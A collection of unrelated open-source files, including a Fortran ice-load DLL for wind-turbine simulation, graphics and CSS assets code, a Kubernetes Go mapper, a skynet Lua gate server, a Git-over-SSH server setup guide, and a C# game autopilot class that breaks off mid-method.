! Licensed under the Apache License, Version 2.0 (the "License");
! you may not use this file except in compliance with the License.
! You may obtain a copy of the License at
!
! http://www.apache.org/licenses/LICENSE-2.0
!
! Unless required by applicable law or agreed to in writing, software
! distributed under the License is distributed on an "AS IS" BASIS,
! WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
! See the License for the specific language governing permissions and
! limitations under the License.
!************************************************************************
!**********************************************************************************************************************************
! File last committed: $Date: 2014-06-24 10:28:50 -0700 (Tue, 24 Jun 2014) $
! (File) Revision #: $Rev: 150 $
! URL: $HeadURL: http://sel1004.verit.dnv.com:8080/svn/LoadSimCtl_SurfaceIce/trunk/IceDyn_IntelFortran/HAWC2_DLL/HAWC2_DLL.f90 $
!**********************************************************************************************************************************
! DLL to be linked with the HAWC2 Aeroelastic wind turbine simulation
! As a type 2 DLL per the user manual
module HAWC2DLL
use IceLog
use IceInputParams
use iceFloeBase
use IceCrushingISO
use IceCrushingIEC
use IceIntermittentCrushing
use IceFlexISO
use IceFlexIEC
use IceLockInCrushingISO
use randomCrushing
use IceCpldCrushing
use NWTC_IO, only : DispNVD, progdesc, curdate, curtime
TYPE(iceFloe_ParameterType), save :: icep ! Parameters, including precalculated time series
type(iceFloe_LoggingType),save :: theIceLog ! structure with message and error logging variables
end module HAWC2DLL
subroutine icefloe_init (array1, array2)
! Expose this subroutine to users of this DLL
!DEC$ ATTRIBUTES DLLEXPORT, C, ALIAS:'icefloe_init' :: icefloe_init
use HAWC2DLL
implicit none
! input
real(8), intent(IN) :: array1(1)
! output
real(8), intent(OUT) :: array2(1)
! locals
Real(ReKi) :: duration
INTEGER(IntKi) :: nSteps
INTEGER(IntKi) :: Err ! Error status of the operation
LOGICAL, SAVE :: bInit = .FALSE. ! Initialization flag
TYPE(ProgDesc), PARAMETER :: IceFloe_Ver = ProgDesc( 'IceFloe', 'v1.00.00', 'May-2014' )
! More IceFloe types
type(iceInputType) :: iceInput ! hold list of input names and values from file
character(132) :: logFile ! File name for message logging
! Initialise on first call
IF (.NOT.bInit) THEN
bInit = .TRUE.
ENDIF
! Set up error logging
theIceLog%warnFlag = .false.
theIceLog%ErrID = ErrID_None
theIceLog%ErrMsg = ""
! Initialize the NWTC Subroutine Library
! CALL NWTC_Init( )
! Display the module information
CALL DispNVD( IceFloe_Ver )
call openIceLog (theIceLog, 'IceFloe.log')
call logMessage(theIceLog, ' Running: '//trim(IceFloe_Ver%Name)//trim(IceFloe_Ver%Ver)//trim(IceFloe_Ver%Date))
call logMessage(theIceLog, ' This run started on: '//curdate()//' at '//curtime()//newLine)
call countIceInputs('testIce.inp', theIceLog, iceInput)
call readIceInputs(theIceLog, iceInput)
call logMessage(theIceLog, ' Input file read complete.'//newLine)
! call IceFloe initialization routine and get parameters back
! not all parameters used by all ice floe types
call getIceInput(iceInput, 'iceType',icep%iceType, theIceLog, lowTypeLimit, hiTypeLimit)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! Set the time step as the minimum of the suggested p%dt and the time step from the ice input file
call getIceInput(iceInput, 'timeStep',icep%dt, theIceLog, 0.0)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! get the duration of the simulation
call getIceInput(iceInput, 'duration', duration, theIceLog, 0.0)
call logMessage(theIceLog, ' Load time series duration = '//TRIM(Num2LStr(duration))//' sec')
! get the load ramp up time
call getIceInput(iceInput, 'rampTime', icep%rampTime, theIceLog, 0.0)
call logMessage(theIceLog, ' Load ramp up time = '//TRIM(Num2LStr(icep%rampTime))//' sec')
! get the number of legs on the support structure
call getIceInput(iceInput, 'numLegs', icep%numLegs, theIceLog, 1, 4)
if (theIceLog%ErrID >= AbortErrLev) then
return
endif
! allocate storage for load series
nSteps = ceiling(duration/icep%dt) + 1 ! + 1 for zero point
allocate(icep%loadSeries(nSteps, icep%numLegs), stat=err)
if (err /= 0) then
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Error in time series array allocation in IceFloe_init', 1)
return
endif
! point internal iceFloe array to the saved load series
! icep%loadSeries => loadseries
! allocate storage for the leg positions
allocate (icep%legX(icep%numLegs), stat=err)
allocate (icep%legY(icep%numLegs), stat=err)
allocate (icep%ks(icep%numLegs), stat=err)
if (err /= 0) then
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Error in allocation of leg data in parameters', 1)
return ! error in array allocation
endif
icep%legX = 0.0
icep%legY = 0.0
icep%ks = 1.0
iceType: select case (icep%iceType)
case (randomCrush)
call initRandomCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Random continuous ice crushing via ISO/Karna initialized'//newLine)
case (interCrush)
call initInterCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Intermittent ice crushing loads initialized'//newLine)
case (crushIEC)
call initCrushingIEC(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Ice crushing loads IEC/Korzhavin initialized'//newLine)
case (flexFailISO)
call initFlexISO(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' ISO/Croasdale ice flexural failure loads initialized'//newLine)
case (flexFailIEC)
call initFlexIEC(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' IEC/Ralston ice flexural failure loads initialized'//newLine)
case (lockInISO)
call initLockInCrushingISO(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Frequency lock-in ice crushing loads via ISO initialized'//newLine)
case (cpldCrush)
call initCpldCrushing(iceInput, icep, theIceLog)
if (theIceLog%ErrID <= ErrID_Warn) &
call logMessage(theIceLog, newLine//' Coupled crushing ice loads (Maattanen) initialized'//newLine)
case default
call iceErrorHndlr (theIceLog, ErrID_Fatal, 'Invalid ice floe type, ' &
//TRIM(Num2LStr(icep%IceType))//' is not a valid selection', 1)
end select iceType
array2 = 0.0d0
end subroutine icefloe_init
SUBROUTINE icefloe_update(array1, array2)
! Expose this subroutine to users of this DLL
!DEC$ ATTRIBUTES DLLEXPORT, C, ALIAS:'icefloe_update' :: icefloe_update
use HAWC2DLL
implicit none
! input
real(8), intent(IN) :: array1(1+3*icep%numLegs) ! 1) Time, then Vx, Vy, Vz for each leg, all in HAWC coords
! output
real(8), intent(OUT) :: array2(2*icep%numLegs) ! Fx and Fy (in HAWC coords)
REAL(DbKi) :: t ! Current simulation time in seconds
real(ReKi) :: loadVect(6,icep%numLegs)
real(ReKi) :: inVels(2,icep%numLegs)
integer(IntKi) :: nL
! reset error logging
theIceLog%warnFlag = .false.
theIceLog%ErrID = ErrID_None
theIceLog%ErrMsg = ""
t = array1(1)
inVels = 0.0
! HAWC has +y axis downwind, x lateral, z + down
! IceFloe has +x axis downwind, y lateral, z + up
do nL = 1, icep%numLegs
inVels(1,nL) = array1(3*nL)
inVels(2,nL) = array1(3*nL-1)
enddo
! get loads from IceFloe
iceType: select case (icep%iceType)
case (randomCrush)
loadVect = outputRandomCrushLoad(icep, theIceLog, t)
case (crushIEC)
loadVect = outputCrushLoadIEC(icep, theIceLog, t)
case (interCrush)
loadVect = outputInterCrushLoad(icep, theIceLog, t)
case (flexFailISO)
loadVect = outputFlexLoadISO(icep, theIceLog, t)
case (flexFailIEC)
loadVect = outputFlexLoadIEC(icep, theIceLog, t)
case (lockInISO)
loadVect = outputLockInLoadISO(icep, theIceLog, t)
case (cpldCrush)
loadVect = outputCpldCrushLoad(icep, theIceLog, inVels, t)
case default
call logFatal (theIceLog, 'Invalid Ice Floe Type Selection', 1)
end select iceType
!TODO deal w/ single point application
!Apply ramp for first 10 seconds
loadVect = loadVect*min(1.0, array1(1)/icep%rampTime)
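! Note: in addition to the rampTime scaling above, each output component in the
! loop below is also multiplied by min(1.0, 0.1*t), i.e. a fixed 10-second ramp.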
do nL = 1, icep%numLegs
array2(2*nL-1) = dble(loadVect(2,nL))*min(1.0, 0.1*t)
array2(2*nL) = dble(loadVect(1,nL))*min(1.0, 0.1*t)
enddo
end SUBROUTINE icefloe_update
| {
"pile_set_name": "Github"
} |
/*
File: PVRTexture.h
Abstract: The PVRTexture class is responsible for loading .pvr files.
Version: 1.0
Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple Inc.
("Apple") in consideration of your agreement to the following terms, and your
use, installation, modification or redistribution of this Apple software
constitutes acceptance of these terms. If you do not agree with these terms,
please do not use, install, modify or redistribute this Apple software.
In consideration of your agreement to abide by the following terms, and subject
to these terms, Apple grants you a personal, non-exclusive license, under
Apple's copyrights in this original Apple software (the "Apple Software"), to
use, reproduce, modify and redistribute the Apple Software, with or without
modifications, in source and/or binary forms; provided that if you redistribute
the Apple Software in its entirety and without modifications, you must retain
this notice and the following text and disclaimers in all such redistributions
of the Apple Software.
Neither the name, trademarks, service marks or logos of Apple Inc. may be used
to endorse or promote products derived from the Apple Software without specific
prior written permission from Apple. Except as expressly stated in this notice,
no other rights or licenses, express or implied, are granted by Apple herein,
including but not limited to any patent rights that may be infringed by your
derivative works or by other works in which the Apple Software may be
incorporated.
The Apple Software is provided by Apple on an "AS IS" basis. APPLE MAKES NO
WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED
WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND OPERATION ALONE OR IN
COMBINATION WITH YOUR PRODUCTS.
IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, MODIFICATION AND/OR
DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED AND WHETHER UNDER THEORY OF
CONTRACT, TORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, EVEN IF
APPLE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Copyright (C) 2008 Apple Inc. All Rights Reserved.
*/
#import <Foundation/Foundation.h>
#import "Platforms/CCGL.h"
#import "CCTexture2D.h"
#pragma mark -
#pragma mark CCTexturePVR
struct CCPVRMipmap {
unsigned char *address;
unsigned int len;
};
enum {
CC_PVRMIPMAP_MAX = 16,
};
/** CCTexturePVR
Object that loads PVR images.
Supported PVR formats:
- RGBA8888
- BGRA8888
- RGBA4444
- RGBA5551
- RGB565
- A8
- I8
- AI88
- PVRTC 4BPP
- PVRTC 2BPP
Limitations:
Pre-generated mipmaps, such as PVR textures with mipmap levels embedded in the file,
are only supported if all individual sprites are of _square_ size.
To use mipmaps with non-square textures, instead call CCTexture2D#generateMipmap on the sheet texture itself
(and to save space, save the PVR sprite sheet without mip maps included).
*/
@interface CCTexturePVR : NSObject
{
struct CCPVRMipmap mipmaps_[CC_PVRMIPMAP_MAX]; // pointer to mipmap images
NSUInteger numberOfMipmaps_; // number of mipmap used
unsigned int tableFormatIndex_;
uint32_t width_, height_;
GLuint name_;
BOOL hasAlpha_;
// cocos2d integration
BOOL retainName_;
CCTexture2DPixelFormat format_;
}
/** initializes a CCTexturePVR with a path */
- (id)initWithContentsOfFile:(NSString *)path;
/** initializes a CCTexturePVR with a URL */
- (id)initWithContentsOfURL:(NSURL *)url;
/** creates and initializes a CCTexturePVR with a path */
+ (id)pvrTextureWithContentsOfFile:(NSString *)path;
/** creates and initializes a CCTexturePVR with a URL */
+ (id)pvrTextureWithContentsOfURL:(NSURL *)url;
/** texture id name */
@property (nonatomic,readonly) GLuint name;
/** texture width */
@property (nonatomic,readonly) uint32_t width;
/** texture height */
@property (nonatomic,readonly) uint32_t height;
/** whether or not the texture has alpha */
@property (nonatomic,readonly) BOOL hasAlpha;
/** how many mipmaps the texture has. 1 means one level (level 0). */
@property (nonatomic, readonly) NSUInteger numberOfMipmaps;
// cocos2d integration
@property (nonatomic,readwrite) BOOL retainName;
@property (nonatomic,readonly) CCTexture2DPixelFormat format;
@end
| {
"pile_set_name": "Github"
} |
var equal = require('assert').equal;
var rpad = require('../rpad');
test('#rpad', function() {
equal(rpad('1', 8), '1 ');
equal(rpad(1, 8), '1 ');
equal(rpad('1', 8, '0'), '10000000');
equal(rpad('foo', 8, '0'), 'foo00000');
equal(rpad('foo', 7, '0'), 'foo0000');
equal(rpad('', 2), ' ');
equal(rpad(null, 2), ' ');
equal(rpad(undefined, 2), ' ');
});
| {
"pile_set_name": "Github"
} |
$1 Door.blod < input
rm -rf build
| {
"pile_set_name": "Github"
} |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package meta
import (
"sync"
"k8s.io/apimachinery/pkg/runtime/schema"
)
// lazyObject defers loading the mapper until necessary.
type lazyObject struct {
loader func() (RESTMapper, error)
lock sync.Mutex
loaded bool
err error
mapper RESTMapper
}
// NewLazyRESTMapperLoader handles unrecoverable errors when creating a RESTMapper by
// returning those initialization errors when the interface methods are invoked. This defers the
// initialization and any server calls until a client actually needs to perform the action.
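// A typical (hypothetical) use is NewLazyRESTMapperLoader(func() (RESTMapper, error) { return buildDiscoveryMapper() }),
// where buildDiscoveryMapper stands in for whatever expensive, failure-prone constructor should be deferred.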
func NewLazyRESTMapperLoader(fn func() (RESTMapper, error)) RESTMapper {
obj := &lazyObject{loader: fn}
return obj
}
// init lazily loads the mapper, returning an error if initialization has failed.
func (o *lazyObject) init() error {
o.lock.Lock()
defer o.lock.Unlock()
if o.loaded {
return o.err
}
o.mapper, o.err = o.loader()
o.loaded = true
return o.err
}
var _ RESTMapper = &lazyObject{}
func (o *lazyObject) KindFor(resource schema.GroupVersionResource) (schema.GroupVersionKind, error) {
if err := o.init(); err != nil {
return schema.GroupVersionKind{}, err
}
return o.mapper.KindFor(resource)
}
func (o *lazyObject) KindsFor(resource schema.GroupVersionResource) ([]schema.GroupVersionKind, error) {
if err := o.init(); err != nil {
return []schema.GroupVersionKind{}, err
}
return o.mapper.KindsFor(resource)
}
func (o *lazyObject) ResourceFor(input schema.GroupVersionResource) (schema.GroupVersionResource, error) {
if err := o.init(); err != nil {
return schema.GroupVersionResource{}, err
}
return o.mapper.ResourceFor(input)
}
func (o *lazyObject) ResourcesFor(input schema.GroupVersionResource) ([]schema.GroupVersionResource, error) {
if err := o.init(); err != nil {
return []schema.GroupVersionResource{}, err
}
return o.mapper.ResourcesFor(input)
}
func (o *lazyObject) RESTMapping(gk schema.GroupKind, versions ...string) (*RESTMapping, error) {
if err := o.init(); err != nil {
return nil, err
}
return o.mapper.RESTMapping(gk, versions...)
}
func (o *lazyObject) RESTMappings(gk schema.GroupKind, versions ...string) ([]*RESTMapping, error) {
if err := o.init(); err != nil {
return nil, err
}
return o.mapper.RESTMappings(gk, versions...)
}
func (o *lazyObject) ResourceSingularizer(resource string) (singular string, err error) {
if err := o.init(); err != nil {
return "", err
}
return o.mapper.ResourceSingularizer(resource)
}
| {
"pile_set_name": "Github"
} |
/* iCheck plugin flat skin, black
----------------------------------- */
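/* Each state occupies a 22px-wide cell in the flat.png sprite (20x20 icon plus 2px spacing). */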
.icheckbox_flat,
.iradio_flat {
display: inline-block;
*display: inline;
vertical-align: middle;
margin: 0;
padding: 0;
width: 20px;
height: 20px;
background: url(flat.png) no-repeat;
border: none;
cursor: pointer;
}
.icheckbox_flat {
background-position: 0 0;
}
.icheckbox_flat.checked {
background-position: -22px 0;
}
.icheckbox_flat.disabled {
background-position: -44px 0;
cursor: default;
}
.icheckbox_flat.checked.disabled {
background-position: -66px 0;
}
.iradio_flat {
background-position: -88px 0;
}
.iradio_flat.checked {
background-position: -110px 0;
}
.iradio_flat.disabled {
background-position: -132px 0;
cursor: default;
}
.iradio_flat.checked.disabled {
background-position: -154px 0;
}
/* Retina support */
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
only screen and (-moz-min-device-pixel-ratio: 1.5),
only screen and (-o-min-device-pixel-ratio: 3/2),
only screen and (min-device-pixel-ratio: 1.5) {
.icheckbox_flat,
.iradio_flat {
background-image: url([email protected]);
-webkit-background-size: 176px 22px;
background-size: 176px 22px;
}
}
| {
"pile_set_name": "Github"
} |
class Object
# Get object's meta (ghost, eigenclass, singleton) class
def metaclass
class << self
self
end
end
# If class_eval is called on an object, add those methods to its metaclass
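# e.g. obj.class_eval { def greet; "hi"; end }   # greet is defined only on obj's singleton class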
def class_eval(*args, &block)
metaclass.class_eval(*args, &block)
end
end
| {
"pile_set_name": "Github"
} |
local skynet = require "skynet"
local gateserver = require "snax.gateserver"
local watchdog
local connection = {} -- fd -> connection : { fd , client, agent , ip, mode }
local forwarding = {} -- agent -> connection
skynet.register_protocol {
name = "client",
id = skynet.PTYPE_CLIENT,
}
local handler = {}
function handler.open(source, conf)
watchdog = conf.watchdog or source
end
function handler.message(fd, msg, sz)
-- recv a package, forward it
local c = connection[fd]
local agent = c.agent
if agent then
-- It's safe to redirect msg directly; the gateserver framework will not free msg.
skynet.redirect(agent, c.client, "client", fd, msg, sz)
else
skynet.send(watchdog, "lua", "socket", "data", fd, skynet.tostring(msg, sz))
-- skynet.tostring will copy msg to a string, so we must free msg here.
skynet.trash(msg,sz)
end
end
function handler.connect(fd, addr)
local c = {
fd = fd,
ip = addr,
}
connection[fd] = c
skynet.send(watchdog, "lua", "socket", "open", fd, addr)
end
local function unforward(c)
if c.agent then
forwarding[c.agent] = nil
c.agent = nil
c.client = nil
end
end
local function close_fd(fd)
local c = connection[fd]
if c then
unforward(c)
connection[fd] = nil
end
end
function handler.disconnect(fd)
close_fd(fd)
skynet.send(watchdog, "lua", "socket", "close", fd)
end
function handler.error(fd, msg)
close_fd(fd)
skynet.send(watchdog, "lua", "socket", "error", fd, msg)
end
function handler.warning(fd, size)
skynet.send(watchdog, "lua", "socket", "warning", fd, size)
end
local CMD = {}
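-- Commands sent to this gate via skynet.call/send(gate, "lua", cmd, ...):
--   forward: bind fd to an agent service so further client packets are redirected to it
--   accept : open the client without an agent; packets go to the watchdog as "data" messages
--   kick   : close the client connection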
function CMD.forward(source, fd, client, address)
local c = assert(connection[fd])
unforward(c)
c.client = client or 0
c.agent = address or source
forwarding[c.agent] = c
gateserver.openclient(fd)
end
function CMD.accept(source, fd)
local c = assert(connection[fd])
unforward(c)
gateserver.openclient(fd)
end
function CMD.kick(source, fd)
gateserver.closeclient(fd)
end
function handler.command(cmd, source, ...)
local f = assert(CMD[cmd])
return f(source, ...)
end
gateserver.start(handler)
| {
"pile_set_name": "Github"
} |
package common
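// EdwardVersion is the current release version of Edward.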
const EdwardVersion = "1.9.1"
| {
"pile_set_name": "Github"
} |
export { default as export0 } from "./lib";
export { default as export1 } from "./lib.dom";
export { default as export2 } from "./lib.dom.iterable";
export { default as export3 } from "./lib.es2015.collection";
export { default as export4 } from "./lib.es2015.core";
export { default as export5 } from "./lib.es2015";
export { default as export6 } from "./lib.es2015.generator";
export { default as export7 } from "./lib.es2015.iterable";
export { default as export8 } from "./lib.es2015.promise";
export { default as export9 } from "./lib.es2015.proxy";
export { default as export10 } from "./lib.es2015.reflect";
export { default as export11 } from "./lib.es2015.symbol";
export { default as export12 } from "./lib.es2015.symbol.wellknown";
export { default as export13 } from "./lib.es2016.array.include";
export { default as export14 } from "./lib.es2016";
export { default as export15 } from "./lib.es2016.full";
export { default as export16 } from "./lib.es2017";
export { default as export17 } from "./lib.es2017.full";
export { default as export18 } from "./lib.es2017.intl";
export { default as export19 } from "./lib.es2017.object";
export { default as export20 } from "./lib.es2017.sharedmemory";
export { default as export21 } from "./lib.es2017.string";
export { default as export22 } from "./lib.es2017.typedarrays";
export { default as export23 } from "./lib.es2018.asyncgenerator";
export { default as export24 } from "./lib.es2018.asynciterable";
export { default as export25 } from "./lib.es2018";
export { default as export26 } from "./lib.es2018.full";
export { default as export27 } from "./lib.es2018.intl";
export { default as export28 } from "./lib.es2018.promise";
export { default as export29 } from "./lib.es2018.regexp";
export { default as export30 } from "./lib.es2019.array";
export { default as export31 } from "./lib.es2019";
export { default as export32 } from "./lib.es2019.full";
export { default as export33 } from "./lib.es2019.object";
export { default as export34 } from "./lib.es2019.string";
export { default as export35 } from "./lib.es2019.symbol";
export { default as export36 } from "./lib.es2020.bigint";
export { default as export37 } from "./lib.es2020";
export { default as export38 } from "./lib.es2020.full";
export { default as export39 } from "./lib.es2020.intl";
export { default as export40 } from "./lib.es2020.promise";
export { default as export41 } from "./lib.es2020.string";
export { default as export42 } from "./lib.es2020.symbol.wellknown";
export { default as export43 } from "./lib.es5";
export { default as export44 } from "./lib.es6";
export { default as export45 } from "./lib.esnext";
export { default as export46 } from "./lib.esnext.full";
export { default as export47 } from "./lib.esnext.intl";
export { default as export48 } from "./lib.esnext.promise";
export { default as export49 } from "./lib.esnext.string";
export { default as export50 } from "./lib.scripthost";
export { default as export51 } from "./lib.webworker";
export { default as export52 } from "./lib.webworker.importscripts";
| {
"pile_set_name": "Github"
} |
package org.wildfly.swarm.examples.microprofile.opentracing;
import javax.enterprise.context.ApplicationScoped;
import org.eclipse.microprofile.opentracing.Traced;
/**
* @author Pavol Loffay
*/
@Traced
@ApplicationScoped
public class ServiceBean {
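// The class-level @Traced annotation tells MicroProfile OpenTracing to create a span for every business method invocation, including method().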
public String method() {
return ServiceBean.class.getSimpleName() + ".method";
}
}
| {
"pile_set_name": "Github"
} |
# Setting Up the Server
Let's walk through setting up SSH access on the server side. In this example you'll use the `authorized_keys` method for authorizing your users. We'll also assume you're running a standard Linux distribution like Ubuntu. First, create a user named 'git' and a `.ssh` directory for that user.
$ sudo adduser git
$ su git
$ cd
$ mkdir .ssh
Next, add the developers' SSH public keys to that user's `authorized_keys` file. Let's assume you've received a few keys by e-mail and saved them to temporary files. Again, a public key looks something like this:
$ cat /tmp/id_rsa.john.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCB007n/ww+ouN4gSLKssMxXnBOvf9LGt4L
ojG6rs6hPB09j9R/T17/x4lhJA0F3FR1rP6kYBRsWj2aThGw6HXLm9/5zytK6Ztg3RPKK+4k
Yjh6541NYsnEAZuXz0jTTyAUfrtU3Z5E003C4oxOj6H0rfIF1kKI9MAQLMdpGW1GYEIgS9Ez
Sdfd8AcCIicTDWbqLAcU4UpkaX8KyGlLwsNuuGztobF8m72ALC/nLF6JLtPofwFBlgc+myiv
O7TCUSBdLQlgMVOFq1I2uPWQOkOWQAHukEOmfjy2jctxSDBQ220ymjaNsHT4kgtZg2AYYgPq
dAv8JggJICUvax2T9va5 gsg-keypair
You just append them, one by one, to the end of the `authorized_keys` file:
$ cat /tmp/id_rsa.john.pub >> ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.josie.pub >> ~/.ssh/authorized_keys
$ cat /tmp/id_rsa.jessica.pub >> ~/.ssh/authorized_keys
Now you can set up an empty (bare) repository for them by running `git init` with the `--bare` option, which initializes a repository without a working directory:
$ cd /opt/git
$ mkdir project.git
$ cd project.git
$ git --bare init
At this point, John, Josie, or Jessica can add it as a remote repository, push a branch, and thereby upload the first version of the project. Note that someone has to shell onto the machine and create a bare repository every time a new project is added. Let's use `gitserver` as the hostname of the machine where the `git` user and the repositories live. If you run it inside your network and set up DNS so that `gitserver` points to that host, then the following commands all work:
# 在 John 的电脑上
$ cd myproject
$ git init
$ git add .
$ git commit -m 'initial commit'
$ git remote add origin git@gitserver:/opt/git/project.git
$ git push origin master
After that, the others can clone it and push changes back just as easily:
$ git clone git@gitserver:/opt/git/project.git
$ cd project
$ vim README
$ git commit -am 'fix for the README file'
$ git push origin master
With this approach, you can quickly get a read/write Git server up and running for a handful of developers.
As an extra precaution, you can restrict the `git` user to Git-related activities with the `git-shell` tool that ships with Git. If you set it as the login shell for the `git` user, that user can't get a normal bash or csh shell on the server. To do so, edit the `/etc/passwd` file:
$ sudo vim /etc/passwd
At the bottom, you should find a line that looks something like this:
git:x:1000:1000::/home/git:/bin/sh
Change `/bin/sh` to `/usr/bin/git-shell` (or run `which git-shell` to see where it's installed). The modified line looks like this:
git:x:1000:1000::/home/git:/usr/bin/git-shell
Now the `git` user can only use SSH connections to push and pull Git repositories and can't get a shell on the machine. If you try to log in over SSH normally, you'll see a rejection like this:
$ ssh git@gitserver
fatal: What do you think I am? A shell?
Connection to gitserver closed.
| {
"pile_set_name": "Github"
} |
CSEXPORT void CSCONV Export_FInputAxisBinding_Get_AxisName(FInputAxisBinding* instance, FName& result)
{
result = instance->AxisName;
}
CSEXPORT void CSCONV Export_FInputAxisBinding_Set_AxisName(FInputAxisBinding* instance, const FName& value)
{
instance->AxisName = value;
}
CSEXPORT FInputAxisUnifiedDelegate& CSCONV Export_FInputAxisBinding_Get_AxisDelegate(FInputAxisBinding* instance)
{
return instance->AxisDelegate;
}
CSEXPORT float CSCONV Export_FInputAxisBinding_Get_AxisValue(FInputAxisBinding* instance)
{
return instance->AxisValue;
}
CSEXPORT void CSCONV Export_FInputAxisBinding_Set_AxisValue(FInputAxisBinding* instance, float value)
{
instance->AxisValue = value;
}
CSEXPORT void CSCONV Export_FInputAxisBinding(RegisterFunc registerFunc)
{
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisName);
REGISTER_FUNC(Export_FInputAxisBinding_Set_AxisName);
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisDelegate);
REGISTER_FUNC(Export_FInputAxisBinding_Get_AxisValue);
REGISTER_FUNC(Export_FInputAxisBinding_Set_AxisValue);
}
| {
"pile_set_name": "Github"
} |
/* Simple_def.h
*
* Copyright (C) 1992-2012,2015,2017 Paul Boersma
*
* This code is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This code is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this work. If not, see <http://www.gnu.org/licenses/>.
*/
#define ooSTRUCT SimpleInteger
oo_DEFINE_CLASS (SimpleInteger, Daata)
oo_INTEGER (number)
oo_END_CLASS (SimpleInteger)
#undef ooSTRUCT
#define ooSTRUCT SimpleDouble
oo_DEFINE_CLASS (SimpleDouble, Daata)
oo_DOUBLE (number)
oo_END_CLASS (SimpleDouble)
#undef ooSTRUCT
#define ooSTRUCT SimpleString
oo_DEFINE_CLASS (SimpleString, Daata)
oo_STRING (string)
oo_END_CLASS (SimpleString)
#undef ooSTRUCT
/* End of file Simple_def.h */
| {
"pile_set_name": "Github"
} |
package types
// KubernetesDistro represents a Kubernetes distribution.
type KubernetesDistro int
// EtcdResponse represents the response of an etcd2 server at /version
// endpoint. Example:
//
// {
// "etcdserver": "2.3.8",
// "etcdcluster": "2.3.0"
// }
type EtcdResponse struct {
EtcdServerVersion string `json:"etcdserver"`
EtcdClusterVersion string `json:"etcdcluster"`
}
// Reap function types take a path and a value and perform
// some action on it, for example, storing it to disk or
// writing it to stdout. The arg parameter is optional
// and can be used by the function in a context-dependent way,
// for example, it can specify a directory to write to.
type Reap func(path, value string, arg interface{}) error
| {
"pile_set_name": "Github"
} |
using Sandbox.Common.ObjectBuilders;
using Sandbox.Engine.Utils;
using Sandbox.Game.Entities;
using Sandbox.Game.Multiplayer;
using Sandbox.Game.World;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using VRage.ObjectBuilders;
using VRageMath;
using VRageRender;
namespace Sandbox.Game.AI
{
[MyAutopilotType(typeof(MyObjectBuilder_SimpleAutopilot))]
class MySimpleAutopilot : MyAutopilotBase
{
private static readonly int SHIP_LIFESPAN_MILLISECONDS = 30 * 60 * 1000; //30 minutes
private Vector3D m_destination;
private Vector3 m_direction;
private int m_spawnTime;
public MySimpleAutopilot() : this(Vector3.Zero, Vector3.One) { }
public MySimpleAutopilot(Vector3D destination, Vector3 direction)
{
m_destination = destination;
m_direction = direction;
m_spawnTime = MySandboxGame.TotalGamePlayTimeInMilliseconds;
}
public override MyObjectBuilder_AutopilotBase GetObjectBuilder()
{
MyObjectBuilder_SimpleAutopilot ob = MyObjectBuilderSerializer.CreateNewObject<MyObjectBuilder_SimpleAutopilot>();
ob.Destination = m_destination;
ob.Direction = m_direction;
return ob;
}
public override void Init(MyObjectBuilder_AutopilotBase objectBuilder)
{
MyObjectBuilder_SimpleAutopilot ob = (MyObjectBuilder_SimpleAutopilot)objectBuilder;
m_destination = ob.Destination;
m_direction = ob.Direction;
m_spawnTime = MySandboxGame.TotalGamePlayTimeInMilliseconds;
}
protected override void OnShipControllerChanged()
{ }
public override void Update()
{
if (ShipController == null) return;
int lifeTime = MySandboxGame.TotalGamePlayTimeInMilliseconds - m_spawnTime;
if (lifeTime > SHIP_LIFESPAN_MILLISECONDS)
{
if (!IsPlayerNearby())
{
var shipGroup = MyCubeGridGroups.Static.Logical.GetGroup(ShipController.CubeGrid);
foreach (var node in shipGroup.Nodes)
{
node.NodeData.SyncObject.SendCloseRequest();
}
}
}
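// Despawn the ship once it has passed the plane through its destination, unless a player is nearby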
